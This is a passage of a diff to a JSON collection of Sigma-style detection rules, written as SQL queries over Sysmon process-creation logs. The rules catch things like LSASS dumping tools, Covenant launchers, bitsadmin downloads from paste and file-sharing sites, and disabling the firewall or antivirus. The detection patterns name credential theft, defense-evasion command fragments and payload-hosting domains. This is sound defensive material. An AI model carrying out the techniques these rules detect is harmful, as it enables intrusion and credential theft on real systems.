'%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.t1053.005" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Administrative activity", + "Software installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", - "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "title": "Firewall Disabled via Netsh.EXE", + "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", + "status": "test", + "description": "Detects netsh commands that turns off the Windows firewall", + "author": "Fatih Sirin", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.004", + "attack.s0108" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_netsh_fw_disable.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1036" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", - "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "title": "Windows Share Mount Via Net.EXE", + "id": "f117933c-980c-4f78-b384-e3d838111165", + "status": "experimental", + "description": "Detects when a share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Legitimate activity by administrators and scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_net_use_mount_share.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", - "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "title": "Suspicious Rundll32 Invoking Inline VBScript", + "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", - "tags": [ - "attack.lateral_movement", - "attack.t1021" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "title": "Use of Setres.exe", + "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", + "author": "@gott_cyber", "tags": [ "attack.defense_evasion", + "attack.t1218", "attack.t1202" ], "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" - }, - { - "title": "Suspicious X509Enrollment - Process Creation", - "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", - "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", - "falsepositives": [ - "Legitimate administrative script" + "Legitimate usage of Setres" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\setres.exe' ESCAPE '\\' AND Image LIKE '%\\\\choice' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_x509enrollment.yml" + "filename": "proc_creation_win_lolbin_setres.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", + "title": "Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ], + "falsepositives": [ + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Exotic software" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", - "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "title": "Write Protect For Storage Disabled", + "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "status": "experimental", + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "title": "Application Whitelisting Bypass via Dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "test", + "description": "Detects execution of of Dxcap.exe", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate execution of dxcap.exe by legitimate user" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_lolbin_susp_dxcap.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", 